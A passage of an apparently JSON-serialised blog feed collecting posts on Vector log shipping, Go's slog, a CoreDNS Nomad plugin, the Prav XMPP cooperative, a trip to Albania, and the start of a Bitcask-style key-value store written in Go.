Sustainability","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-open-source-sustainability\u002F","Sat, 18 Feb 2023 13:55:22 GMT","Overworked maintainers & understaffed projects are the foundations that open source and, thereby, most of your daily drivers are built on. Corporate open source customers need to be better citizens in order to move towards a more sustainable model of open source.",[701,1233],{"slug":1377,"title":1378,"link":1379,"pubDate":1380,"contentSnippet":1381,"tags":1382,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"missing-duplicate-logs","The curious case of missing and duplicate logs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmissing-duplicate-logs\u002F","2023-02-16T08:27:13.000Z","At work, we use a Vector pipeline for processing and shipping logs to Clickhouse. We also self-host our SMTP servers and recently started using Haraka SMTP. While Haraka is excellent in raw performance and throughput, it needed an external logging plugin for audit and compliance purposes. I wrote haraka-plugin-outbound-logger to log basic metadata like timestamps\u002Fsubject\u002FSMTP response in a JSON file.\nThe plan was to dump these logs into a file and use Vector’s file source for reading them and doing the further transformation. However, things went differently than I had planned. There were mainly two issues propped up due to bad Vector configuration.\nMissing logs#\nThe vector configuration to read the file looked like this:\n[sources.outbound_logger]\ntype = \"file\"\ninclude = [\"\u002Fvar\u002Flog\u002Fharaka\u002Foutbound\u002F*.log\"]\nread_from = \"beginning\"\n# Remove the files after 24 hours. Vector must have permission to delete these files.\nremove_after_secs = 86400\nfingerprint.strategy = \"device_and_inode\"\n\nVector has a handy configuration of automagically deleting the file if the file hasn’t received any new write in the configured time interval. So remove_after_secs=86400 specifies if the file hasn’t had any new writes since 24h, it can delete it. It made sense to configure because our workload was a shorter process. It was a batch job done once every N days.\nWhen the file didn’t receive any new writes after 24h, vector deleted the file as expected. However, the plugin continued logging into the same file handler, even for newer batch jobs. As a result, the file didn’t receive any new logs and was empty.\nI created a minimal POC to reproduce this seemingly strange issue:\nvar pino = require('pino');\n\n\u002F\u002F Initialise pino js logger and inject in the plugin context.\nvar opts = {\n    name: 'outbound_logger',\n    level: 'debug',\n    \u002F\u002F uses the ISO time format.\n    timestamp: pino.stdTimeFunctions.isoTime,\n    formatters: {\n        level: (label) => {\n            return { level: label };\n        },\n    },\n}\n\npilog = pino(opts, pino.destination(`${__dirname}\u002Fapp.log`))\n\npilog.info('this is a first message')\nsetTimeout(() => pilog.info('this message should get logged'), 10000)\npilog.info('this message will be recorded as well')\nThis snippet logs to app.log.\n{\"level\":\"info\",\"time\":\"2023-02-16T06:45:04.031Z\",\"pid\":206573,\"hostname\":\"pop-os\",\"name\":\"outbound_logger\",\"msg\":\"this is a first message\"}\n{\"level\":\"info\",\"time\":\"2023-02-16T06:45:04.031Z\",\"pid\":206573,\"hostname\":\"pop-os\",\"name\":\"outbound_logger\",\"msg\":\"this message will be recorded as well\"}\n\nDuring the 10s time interval, I deleted the file from the disk rm app.log to mimic the behaviour of remove_after_secs. I expected the file to get re-created and this message should get logged logged by the above script.\nHowever, that didn’t happen. The script didn’t complain about a missing file, either. I was perplexed and did some google-fu and found the following via Stackoverflow:\nThe writes actually do not fail.When you delete a file that is open in another program you are deleting a named link to that file’s inode. The program that has it open still points to that inode. It will happily keep writing to it, actually writing to disk. Only now you don’t have a way to look it at, because you deleted the named reference to it. (If there were other references, e.g. hard links, you would still be able to!).\nThis is exactly what was happening in production. When vector deleted the file (as configured via remove_after_secs ), the plugin didn’t know about it and kept writing to the same inode. This was a major TIL moment for me.\nFix: The fix was simple enough; I removed remove_after_secs from Vector’s config. To address the problem of the file not growing unbounded forever, I created a logrotate config:\n\u002Fopt\u002Fapp\u002Flogs\u002Fapp.log {\n    daily\n    rotate 15\n    dateext\n    dateformat -%Y-%m-%d.log\n    delaycompress\n    compress\n    notifempty\n    missingok\n    copytruncate\n}\nSome notes:\ncopytruncate is useful in this context. It copies the existing file to a new one, which now becomes a stale one. The current (active) file will be truncated to zero bytes. E.g., if app.log it is rotated, logrotate will copy the file to a new file app-2023-02-05.log and then truncate the existing one to zero bytes.\ndelaycompress will not compress the logs until the next rotation happens. This is useful if vector hasn’t finished processing the log and can continue to do that.\nDuplicate Logs#\nNow after fixing the case of missing logs, I found myself in the opposite problem - now the logs were duplicated on Clickhouse.\nMy mental state at that moment couldn’t be more accurately described than this meme:\n\nTo add more context, before developing my plugin for logging email delivery in Haraka, we used another plugin (acharkizakaria\u002Fharaka-plugin-accounting-files) to get these logs. This plugin records the metadata to CSV files. Still, there were some issues in properly escaping the subject lines (if the subject had a comma, that was incorrectly parsed); hence, the log file had inconsistent output. To address these issues, I found writing another plugin from scratch that outputs to a fixed JSON schema is better.\nAs seen above, vector’s file source was configured like the following for reading CSV files. The only change here is that remove_after_secs is gone after fixing issue #1.\n[sources.outbound_logger]\ntype = \"file\"\ninclude = [\"\u002Fvar\u002Flog\u002Fharaka\u002Foutbound\u002F*.log\"]\nread_from = \"beginning\"\nfingerprint.strategy = \"device_and_inode\"\nVector “fingerprints” the file source, as it keeps the checkpoint of how many bytes it has read for each file in its own “disk buffer”. This buffer is helpful if Vector crashes so it can restart reading the file from where it last stopped.\nThere are two strategies for fingerprinting that vector uses:\nThe checksum strategy uses CRC check on the first N lines of the file.\nThe device_and_inode strategy uses the disk’s actual inode location to identify the file uniquely.\nAs I was using a different plugin which logged to a CSV file, the checksum strategy did not work in my context. Since vector fingerprints, the first few bytes (usually just enough for a header of a CSV), all the CSV files in that disk would have the same title, and Vector would not read all of them. To work around this, I changed the fingerprint.starategy = \"device_and_inode\" so Vector uniquely identifies all CSV files by their inode path. (In hindsight, I should have just used checksum with a higher value of fingerprint.lines value.)\nThe mistake this time was when I switched to a JSON log file, I continued with the device_and_inode strategy. This isn’t a problem if there is no log rotation setup. Since I did configure logrotate to fix issue #1, as you would have guessed, copytruncate created another log file, and because I was using device_and_inode strategy, vector thought this was a “new” file to be watched and processed. So now I had duplicate entries from this new file, which is technically just an older log-rotated file.\nThe fix:\n[sources.outbound_logger.fingerprint]\nlines = 14\nstrategy = \"checksum\"\nignored_header_bytes = 2048\nI switched back to the default checksum strategy and adjusted the thresholds for lines\u002Fheader bytes to account for JSON logs. The same is also documented very clearly in Vector and it was my RTFM moment.\nThis strategy avoids the common pitfalls associated with using device and inode names since inode names can be reused across files. This enables Vector to properly tail files across various rotation strategies.\nPhew! I am glad after these fixes; vector is durably and reliably processing all the logs and logrotate is happily working in conjunction as well. I hope documenting my learnings about these production issues would help someone with the same problems.\nFin!",[],{"slug":1384,"title":1385,"link":1386,"pubDate":1387,"contentSnippet":1388,"tags":1389,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"structured-logging-in-go-with-slog","Structured logging in Go with slog","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstructured-logging-in-go-with-slog\u002F","2023-02-15T07:29:53.000Z","A few months ago, a proposal for adding a structured logging library in Go was introduced by Jonathan Amsterdam. At present, Go has a minimal and bare-bones log package which works all right for basic use cases. However, the current library has a few shortcomings that this proposal aims to solve:\nEmitting logs with different severity\u002Flevels\nStructured output: Makes parsing of logs harder\nLogging a set of common fields\u002Fattributes\nDifficult to have a log object inside libraries as each service could have its log implementation.\nAs a result, many code bases have their wrappers around the log package. Additionally, there are plenty of 3rd party libraries to choose from - including logf (which my work colleagues and I built at Zerodha).\nThis article is about how to get started with slog for logging in Go applications.\nNOTE\n    \nSince slog is currently in the proposal state and hasn’t yet merged in the official library, the API could change in future.\nArchitecture of slog#\nAt a higher level, slog contains three main entities:\nLogger: The user-facing API for interacting with slog. All the public methods are defined on the Logger object.\nRecord: Contains information about the log event itself. A standard record will have timestamp, level and message fields as default. Additional attributes and metadata like caller info can be added to the Record.\nHandlers: A handler is an interface implementation. The Logger object passes the Record to a handler, and the handler can choose whatever it wants to do with the Record. This is a common approach in Go libraries, where a “provider” can be abstracted in handling that task. Currently, slog ships with two handlers: JSON and logfmt. Some projects have also created handlers for zap\u002Flogrus (popular 3rd party libraries).\nInitialization#\nThis snippet initializes a Text Handler, which produces logfmt format messages on os.Stdout.\npackage main\n\nimport (\n\t\"os\"\n\n\t\"golang.org\u002Fx\u002Fexp\u002Fslog\"\n)\n\nfunc main() {\n\tlog := slog.New(slog.NewTextHandler(os.Stdout))\n\tlog.Info(\"Hello world\")\n\n\tfakeErr := os.ErrNotExist\n\tlog.Error(\"something went wrong\", fakeErr, \"file\", \"\u002Ftmp\u002Fabc.txt\")\n}\n\nLog output:\ntime=2023-02-15T19:58:10.615+05:30 level=INFO msg=\"Hello world\"\ntime=2023-02-15T19:58:10.615+05:30 level=ERROR msg=\"something went wrong\" file=\u002Ftmp\u002Fabc.txt err=\"file does not exist\"\nCustomizing#\nYou’ll notice that the caller information isn’t exposed by default. The reason could be that finding the stack trace of the calling line is a bit expensive operation. However, for libraries\u002Fapps which need it can do that by customizing the handler:\nfunc main() {\n\thandler := slog.HandlerOptions{AddSource: true}\n\tlog := slog.New(handler.NewTextHandler(os.Stdout))\n\n\tlog.Info(\"Hello world\")\n}\n\nLog Output:\ntime=2023-02-15T12:17:53.742+05:30 level=INFO source=\u002Fhome\u002Fkaran\u002FCode\u002FPersonal\u002Fslog-examples\u002Fmain.go:14 msg=\"Hello world\"\nAttributes#\nSometimes, it’s helpful to append specific metadata to each log line which will help in aggregating\u002Ffiltering with a central log-collecting agent. E.g., you can export a component key for each sub-service of your primary application.\nfunc main() {\n\tlog := slog.New(slog.NewTextHandler(os.Stdout)).With(\"component\", \"demo\")\n\tlog.Info(\"Hello world\")\n}\n\nLog Output:\ntime=2023-02-15T12:21:50.231+05:30 level=INFO msg=\"Hello world\" component=demo\nNested Keys#\nSo far, we’ve seen flat keys in the log message. It may be helpful to group together specific keys together and form a nested object. In JSON, that would mean a top-level object with different fields inside. However, in logfmt, it would-be parent.child format.To use nested keys, slog.Group can be used. This example uses http as the top-level key, and all its associated fields will be nested inside.\n\tlog.Info(\"Hello world\", slog.Group(\"http\",\n\t\tslog.String(\"method\", \"GET\"),\n\t\tslog.Int(\"status\", 200),\n\t\tslog.Duration(\"duration\", 250),\n\t\tslog.String(\"method\", \"GET\"),\n\t\tslog.String(\"path\", \"\u002Fapi\u002Fhealth\")))\n\ntime=2023-02-15T12:30:43.130+05:30 level=INFO msg=\"Hello world\" component=demo http.method=GET http.status=200 http.duration=250ns http.method=GET http.path=\u002Fapi\u002Fhealth\nConfigurable Handlers#\nJSON logs are daunting and tedious to read when locally developing applications. However, it’s a great fit for machine parsing of the logs. logfmt hits the sweet spot for being machine parseable and human-readable.However, thanks to the powerful “interface” implementation approach, it’s easy to switch to any handler via user-configurable methods (like config files\u002Fenv variables):\npackage main\n\nimport (\n\t\"os\"\n\n\t\"golang.org\u002Fx\u002Fexp\u002Fslog\"\n)\n\nfunc main() {\n\tvar (\n\t\tenv     = os.Getenv(\"APP_ENV\")\n\t\thandler slog.Handler\n\t)\n\n\tswitch env {\n\tcase \"production\":\n\t\thandler = slog.NewJSONHandler(os.Stdout)\n\tdefault:\n\t\thandler = slog.NewTextHandler(os.Stdout)\n\t}\n\n\tlog := slog.New(handler)\n\tlog.Info(\"Hello world\")\n}\n\n$ go run main.go\ntime=2023-02-15T12:39:45.543+05:30 level=INFO msg=\"Hello world\"\n$ APP_ENV=production go run main.go\n{\"time\":\"2023-02-15T12:39:53.523477544+05:30\",\"level\":\"INFO\",\"msg\":\"Hello world\"}\n\nSummary#\nslog is an excellent proposal, and it’s high time Go gets its official structured logging library. The API is designed to be easy to use, and a clear path is given for users wanting high-performance\u002Fzero-allocs by creating their handlers and making these performance improvements.\nFin",[],{"slug":1391,"title":1392,"link":1393,"pubDate":1394,"contentSnippet":1395,"tags":1396,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-24","Bad Matrix","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fbad-matrix\u002Findex.html","Tue, 14 Feb 2023 00:00:00 +0000","A while ago, someone in the Recurse Center nerdiverse decided we needed a \"Bad Print\". They made one. Things escalated. Bad Matrix happened.",[49,1397],"bash",{"slug":1399,"title":1400,"link":1401,"pubDate":1402,"contentSnippet":1403,"tags":1404,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"00-welcome-html","Welcome to my new blog!","https:\u002F\u002Faryak.me\u002Fblog\u002F00-welcome.html","Sat, 28 Jan 2023 12:39:46 +0000","Hello everybody.\nWelcome to my new blog!\nI created this along with my website redesign and conversion to\npandoc from static html.\nI will try to write based content atleast once a month but no\npromises :P",[1405],"2023\u002F01\u002F28\u002F6",{"slug":1407,"title":1408,"link":1409,"pubDate":1410,"contentSnippet":1411,"tags":1412,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-25","Riff: Classifying Tools for Thought","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Ftools-for-thought\u002Findex.html","Thu, 19 Jan 2023 00:00:00 +0000","Trying out a classification for \"Tools for Thought\" as a means of augmenting the human intellect, hot on the heels of recent community conversations about ChatGPT, CoPilot, Stable Diffusion etc...",[55,49,244,245,246],{"slug":1414,"title":1415,"link":1416,"pubDate":1417,"contentSnippet":1418,"tags":1419,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"backstory-behind-prav-app-project","Backstory Behind Prav Project","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbackstory-behind-prav-app-project\u002F","Wed, 18 Jan 2023 21:02:40 +0530","In 2020, I uninstalled WhatsApp due to its proprietary nature and being backed by a surveillance company. In my quest to find alternatives, I came across many messengers, before finally settling on Matrix and XMPP, both of which are decentralized chat protocols built on freedom-respecting software.\nBut chat applications are only as good as the number of people using them, and it was not easy to onboard people to XMPP or Matrix.\nCreating an account on either of them requires installing an app, followed by choosing a server, a username, and a password. This onboarding process is relatively difficult compared to more commonly-known messengers like WhatsApp and Telegram. It was suitable for privacy-conscious users, but not for the majority of people who are not so privacy-conscious, or who just found it too much effort to invest into a new app.\nAt some point, Praveen (of FSCI fame) introduced me to Quicksy - an XMPP client which provides two features found in WhatsApp -\neasier registration, allowing users to register by entering a phone number and an OTP;\neasier contact discovery, which automatically adds people to your Quicksy contact list if you have their phone number in your phone book.\nThese made onboarding easier, and I was successfully able to use Quicksy to onboard users.\nAt the time, we were also running our own XMPP services at poddery.com and disap.in. These services were run by volunteers, and there had been instances where it took us months to fix something.\nFurther, we found that the XMPP clients weren’t consistent in their features across platforms. For example, Kaidan didn’t have OMEMO encryption, while Gajim doesn’t support calls. So, if a user wants to use a desktop client to make XMPP calls, they need to figure out that they have to install Dino (which is only available on GNU\u002FLinux). Having a consistent brand across all platforms helps newbies, as it might be hard for them to wrap their head around using Dino to talk to Conversations.\nOne day, when Praveen’s friend installed Quicksy to share pictures with him, he gave him an idea to make a business out of it. Praveen also thought it would be better to market our own XMPP service rather than Quicksy, giving us more control over the privacy policy and service operations. This is when he asked me if I would like to get involved, to which I immediately agreed.\nPraveen had many years of experience running XMPP services, albeit in a volunteer setting. He thought of experimenting with paid sysadmins rather than volunteers. This is how the Prav project was born. The phone number and contact discovery part was inspired by the Quicksy app, and the idea of consistent branding across platforms was inspired by Snikket. We also added the idea of making it subscription based, which can help us fund sysadmins and allocate funds towards marketing.\nA few months later, we decided to make it a cooperative so that the decision-making is democratic (one person, one vote, as opposed to companies in which each person has voting power proportional to the number of shares they hold). Nagarjuna proposed we run a beta service to attract people to pledge the cooperative membership. This gave birth to our beta app and service.\nFree software gives users the freedom to adapt the software - but in practice, only programmers or resourceful entities like governments or corporations get to exercise this freedom. With the cooperative model of the Prav project, we want to empower members to collectively decide upon which features to implement, followed by raising funds for developers to implement them.\nI am excited to see how this experiment will turn out.",[],{"slug":1421,"title":1422,"link":1423,"pubDate":1424,"contentSnippet":1425,"tags":1426,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-26","Animating Text Art in JavaScript","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fanimate-text-art-javascript\u002Findex.html","Mon, 16 Jan 2023 00:00:00 +0000","It is with no small thanks to MDN, StackOverflow, Firefox's support for countless open tabs, JavaScript's support for first-class functions, and first-class supportive colleagues, I learned it is possible for a web front end novice to program \"text art animations\". Whatever that is even. Because I thoroughly enjoyed doing just that for Hanukkah of Data 2022. Here's how it went down.",[1427,1428,1429,888,1430,1431,456,533,457],"hanukkah_of_data","text_art","design","frontend","javascript",{"slug":1433,"title":1434,"link":1435,"pubDate":1436,"contentSnippet":1437,"tags":1438,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"coredns-nomad","Building a CoreDNS plugin","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcoredns-nomad\u002F","2023-01-04T18:30:00.000Z","CoreDNS is an extensible DNS server (which is actually a fork of Caddy v1) that can be used to serve DNS records for a domain. It is written in Go and is very easy to extend. It has a plugin system that allows you to write your own plugins to extend its functionality. In this post, I will be writing a plugin for CoreDNS that will allow it to serve DNS records for Nomad services.\nI recently came across a niche use case which required me to use a resolver address for querying Nomad services. Currently Nomad native service discovery is only possible via consul-template (which renders static block of address\u002Fport of services) and HTTP API. I felt adding a DNS interface would be a nice add-on.\nRather than writing and implementing all the boring crux of a DNS server, it’s better to extend on an existing server. CoreDNS fits in well here, it’s also used by K8s for service discovery. CoreDNS has an extensible plugin system which allows you to chain multiple different plugins for handling a request. Stuff like logs\u002Fmetrics\u002Fcaching comes for free with CoreDNS in form of a plugin.\nCoreDNS docs have a handy guide on how to write a plugin from scratch, so I won’t cover that again here. These are just my short notes on how I locally developed the plugin, tested and some problems I encountered during the process.\nDeveloping the plugin#\nFirstly, you need to clone CoreDNS repo. Then, using the example plugin provided, you can create a new repository for your own plugin.\nTo make CoreDNS aware about this plugin, you need to add it to the plugin.cfg file. This file is used by the build script to generate the plugin list. The order of plugins matter here as they define how the request is handled. For example, if you want to log all the requests, you need to add the log plugin before your plugin.\nTo add an external plugin this is the format used:\nnomad:github.com\u002Fmr-karan\u002Fcoredns-nomad\nHowever, since we are developing the plugin locally, we need to add a replace directive in go.mod file to point to the local plugin directory.\nreplace github.com\u002Fmr-karan\u002Fcoredns-nomad => ..\u002F..\u002Fcoredns-nomad\nNext, you can run make in coredns repository. It’ll build the binary and place it in coredns directory. You can run this binary to test your plugin. To check if the plugin indeed exists in the binary, you can use the following command\n.\u002Fcoredns -plugins | grep nomad\nHandling requests#\nThe ServeDNS function is used to handle the DNS request by the plugin. It takes a context.Context and a dns.ResponseWriter as arguments. The dns.ResponseWriter is used to write the response back to the client. The ServeDNS function returns an int which is the status code of the response. The status code is used by the next plugin in the chain to determine if it should handle the request or not.\nSince the nomad plugin expects a query in format of service.namespace.nomad, it validates the query and extracts the service name and namespace from it. If the query is invalid, it returns dns.RcodeServerFailure status code. If the query is valid, it queries the Nomad API for the service and returns the response.\nfunc (n Nomad) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {\n\tstate := request.Request{W: w, Req: r}\n\tqname := state.Name()\n\tqtype := state.QType()\n\n\t\u002F\u002F Split the query name with a `.` as the delimiter and extract namespace and service name.\n\t\u002F\u002F If the query is not for a Nomad service, return.\n\tqnameSplit := dns.SplitDomainName(qname)\n\tif len(qnameSplit) \u003C 3 || qnameSplit[2] != \"nomad\" {\n\t\treturn plugin.NextOrFailure(n.Name(), n.Next, ctx, w, r)\n\t}\n\tnamespace := qnameSplit[1]\n\tserviceName := qnameSplit[0]\n\n...\n\nThe plugin handles A,AAAA and SRV record requests currently. Since A\u002FAAAA records can only contain an IP address, SRV records can be used to advertise the port number.\n\t\t\u002F\u002F Check the query type to format the appriopriate response.\n\t\tswitch qtype {\n\t\tcase dns.TypeA:\n\t\t\tm.Answer = append(m.Answer, &dns.A{\n\t\t\t\tHdr: header,\n\t\t\t\tA:   addr,\n\t\t\t})\n\t\tcase dns.TypeAAAA:\n\t\t\tm.Answer = append(m.Answer, &dns.AAAA{\n\t\t\t\tHdr:  header,\n\t\t\t\tAAAA: addr,\n\t\t\t})\n\n...\n\nCaching#\nWhile some coredns plugins have an in-built support for caching the records to avoid a lookup to Nomad server everytime (which can get expensive), I decided to skip the caching implementation. This is because coredns itself has a cache plugins which supports a lot of various options for controlling the cache. In my testing, just using this cache plugin was sufficient to avoid Nomad lookups each time a query came in.\nTesting the plugin#\nI created a fake HTTP test server and added the URI paths which the Nomad Go client uses to query the Nomad API. This way I could test the plugin without having to run a Nomad cluster locally.\n\t\u002F\u002F Setup a fake Nomad server.\n\tnomadServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tswitch r.URL.Path {\n\t\tdefault:\n\t\t\tt.Errorf(\"Not implemented: %v\", r.URL.Path)\n\t\t\treturn\n\t\tcase \"\u002Fv1\u002Fservice\u002Fexample\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1.2.3.4\",\"Namespace\":\"default\",\"Port\":23202,\"ServiceName\":\"example\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Ffakeipv6\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1:2:3::4\",\"Namespace\":\"default\",\"Port\":8000,\"ServiceName\":\"fakeipv6\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Fmulti\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1.2.3.4\",\"Namespace\":\"default\",\"Port\":25395,\"ServiceName\":\"multi\"},{\"Address\":\"1.2.3.5\",\"Namespace\":\"default\",\"Port\":20888,\"ServiceName\":\"multi\"},{\"Address\":\"1.2.3.6\",\"Namespace\":\"default\",\"Port\":26292,\"ServiceName\":\"multi\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Fnonexistent\":\n\t\t\tw.Write([]byte(`[]`))\n\t\t}\n\t}))\nUsage Example#\nHere are some examples of how this plugin works. The Corefile I’ve used is:\nnomad:1053 {\n    errors\n    debug\n    health\n    log\n    nomad {\n\t\taddress http:\u002F\u002F127.0.0.1:4646\n        ttl 10\n    }\n    prometheus :9153\n    cache 30\n}\nOn running coredns, it connects to a local Nomad agent which is running at http:\u002F\u002F127.0.0.1:4646. I’m running a redis job in Nomad, so I can query the service using the following command:\nnomad service info -namespace=default redis                 \nJob ID  Address              Tags  Node ID   Alloc ID\nredis   192.168.29.76:25395  []    9e02c85b  95170495\nredis   192.168.29.76:20888  []    9e02c85b  a1cf923c\nredis   192.168.29.76:26292  []    9e02c85b  a9d1181a\nNow, the same query can also be handled using the DNS server running by coredns:\ndoggo redis.default.nomad @tcp:\u002F\u002F127.0.0.1:1053\nNAME                \tTYPE\tCLASS\tTTL\tADDRESS      \tNAMESERVER     \nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\t\nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\t\nredis.default.nomad.\tA   \tIN   \t10s\t192.168.29.76\t127.0.0.1:1053\nQuering an SRV record is also possible:\ndig +noall +answer +additional redis.default.nomad @127.0.0.1 -p 1053 SRV\nredis.default.nomad.\t10\tIN\tSRV\t10 10 25395 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tSRV\t10 10 20888 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tSRV\t10 10 26292 redis.default.nomad.\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nredis.default.nomad.\t10\tIN\tA\t192.168.29.76\nCode#\nYou can checkout the source code here.\nFin!",[],{"slug":1440,"title":1441,"link":1442,"pubDate":1443,"contentSnippet":1444,"tags":1445,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"tough-day-in-albania","A Tough Day in Albania","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftough-day-in-albania\u002F","Tue, 27 Dec 2022 02:46:03 +0530","After attending DebConf22 in Kosovo, Akshat and I planned to spend a couple of days in Shkodër, Albania. From Prizren, Kosovo, we reached Tirana, Albania and stayed for a night. Many of the fellow Indians who attended DebConf22 were also with me. The next morning, we checked out and took a bus for Shkodër.\nWhile Akshat boarded the bus and sat with Abraham, I decided to search for some snacks outside before boarding. As a consequence, the bus got full and I didn’t get a seat. Seeing this, a lady from Germany sitting beside Abraham made space for me. Therefore, three people were sitting on two seats. It was a nice gesture, but obviously uncomfortable.\nThe weather was scorchingly hot, and the bus fans weren’t working properly. After a two-hour ride, we deboarded in Shkodër. Akshat and I had booked an apartment from Airbnb. Going by the location, we figured out it was 1 kilometer away, which we decided to walk.\nUpon reaching the location, we texted our apartment owner on Airbnb. On the other side was a lady, and we were not able to understand what she was saying as her texts weren’t in English. We tried translating her texts, but the translation didn’t make sense to us. She seemed to be saying that she has an appointment in the church at 3 o’clock.\nIt was very frustrating. We were standing in hot sun with our apartment nowhere in sight. Then we tried calling her as I had a local SIM card. A boy was passing the street we were on, and we handed the phone to him. However, he could not translate what the lady said, as he probably didn’t know English.\nThen I left Akshat to search for anyone else who could translate. I came across a car repair shop where someone agreed to translate the call for me. After talking with the lady over the phone, the person told me that the location is 2 kilometers away and offered a ride in his car. I told him that I would need to bring my friend as well.\nI went back to Akshat. A girl was passing by on a bicycle. We handed over the phone to her and phoned the lady from our Airbnb booking. The girl translated the call for us in English. She told us that they are calling us at Hotel Rozafa. We asked her for directions to Hotel Rozafa, and we later discovered that it was where the bus from Tirana dropped us, but we didn’t know at that time. We walked towards Hotel Rozafa and came across the car repair shop I mentioned above. Turned out that the person who offered help earlier had left the car repair shop by then.\nThen a person at that car repair place gave us a few grapes and water. At that moment, a few grapes felt refreshing and energizing. Then we went ahead and bought water from a shop. The shopkeeper asked whether we were from Afghanistan, to which we said, “No, we are from India.”\nUpon reaching a shop named Neptune, Akshat texted the lady again, telling her that we had reached Neptune. Turned out they knew that shop as a few minutes later, her husband was there. He came there by taxi to pick us up. It was at this point that their plan was revealed. Earlier, I wondered why they were calling us to Hotel Rozafa - it was to pick us up.\nFinally, we reached our apartment and the lady and her husband gave instructions about how things work at the apartment. She had to call her sister in Italy every time she needed to talk to us as she didn’t know English, so her sister acted as a translator.\nI have noticed with a couple of Airbnbs we had booked in Albania that the locations given online were not correct, and we had to ask for help from the locals. However, the locals in Albania were very helpful. Whether they knew English or not, they always tried to lend a helping hand. I think that the apartment owner taking a taxi to pick us up was a nice gesture as well.",[],{"slug":1447,"title":1448,"link":1449,"pubDate":1450,"contentSnippet":1451,"tags":1452,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"barreldb","Writing a disk-based key-value store in Golang","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbarreldb\u002F","2022-12-17T18:30:00.000Z","I’d been mulling around reading a computer science paper and implementing a project based on it. Distributed systems, Networking and Databases are some of the things that fascinate me a lot. However, I had been looking to implement a more approachable project to avoid getting inundated initially. And I happened to chance upon the Bitcask paper through Avinash’s project: CaskDB.\nAfter giving a quick read of this reasonably short paper, I decided to write a Golang implementation of the same, as it looked like an exciting project. If you’re interested in checking out the complete project, checkout BarrelDB.\nBitcask is a disk-based key-value storage engine designed for fast read and write operations. It is mainly in production use by Riak (which is a distributed database) as one of the storage engines. Bitcask under the hood has a straightforward yet clever design. It writes to the file in an append-only mode. This means that writes are performed only by appending to the end of the file, thus avoiding the need to perform any random disk I\u002FO seek.\nLet’s look at various components of Bitcask:\nFormat of the record#\n\nCRC: Stores the checksum of the value to ensure data consistency\nTimestamp: Timestamp in UNIX format, stored as int32.\nExpiry: If the record has an expiry defined, then the timestamp, in UNIX format, is stored as int32.\nKey Size: Size of the key in bytes\nValue Size: Size of the value in bytes\nKey\nValue\nThis additional metadata stored alongside the key\u002Fvalue is represented with a fixed-width header. Each field is represented as int32, so the total size of the header is 4*5 = 20 bytes. Here’s the code which encodes and decodes this record:\ntype Record struct {\n    Header Header\n    Key    string\n    Value  []byte\n}\n\n\u002F\u002F Header represents the fixed width fields present at the start of every record.\ntype Header struct {\n    Checksum  uint32\n    Timestamp uint32\n    Expiry    uint32\n    KeySize   uint32\n    ValSize   uint32\n}\n\n\u002F\u002F Encode takes a byte buffer, encodes the value of header and writes to the buffer.\nfunc (h *Header) encode(buf *bytes.Buffer) error {\n    return binary.Write(buf, binary.LittleEndian, h)\n}\n\n\u002F\u002F Decode takes a record object decodes the binary value the buffer.\nfunc (h *Header) decode(record []byte) error {\n    return binary.Read(bytes.NewReader(record), binary.LittleEndian, h)\n}\nThe record is encoded in the binary format before storing it on the disk.\nDatafile#\nA “datafile” (term used for the DB file on disk) is an append-only record of all the write operations. An instance of Bitcask can have several datafiles. However, there’s only one “active” datafile. In BarrelDB, a goroutine runs in the background at regular intervals to check if the size of the active DB file has crossed the threshold and then rotates the active file. It appends this DB file to the list of “stale” data files. All the new writes only happen to the “active” data file, and the stale files are merged as a part of the “compaction” process (described later in the post).\n\nHere’s how a datafile is represented:\ntype DataFile struct {\n    sync.RWMutex\n\n    writer *os.File\n    reader *os.File\n    id     int\n\n    offset int\n}\nIt contains different handlers for writing and reading the file. The reason we have 2 file handlers instead of re-using the same one is that the writer is only opened in an “append-only” mode. In addition, since the active file can be rotated, the writer can be set to nil, ensuring no new writes ever happen on that file.\n    writer, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)\n    if err != nil {\n        return nil, fmt.Errorf(\"error opening file for writing db: %w\", err)\n    }\n\n    \u002F\u002F Create a reader for reading the db file.\n    reader, err := os.Open(path)\n    if err != nil {\n        return nil, fmt.Errorf(\"error opening file for reading db: %w\", err)\n    }\nKeyDir#\nIn addition to storing the file on disk, Bitcask also stores additional metadata, which defines how to retrieve the record. This hashtable is a map of keys with this metadata and is referred to as 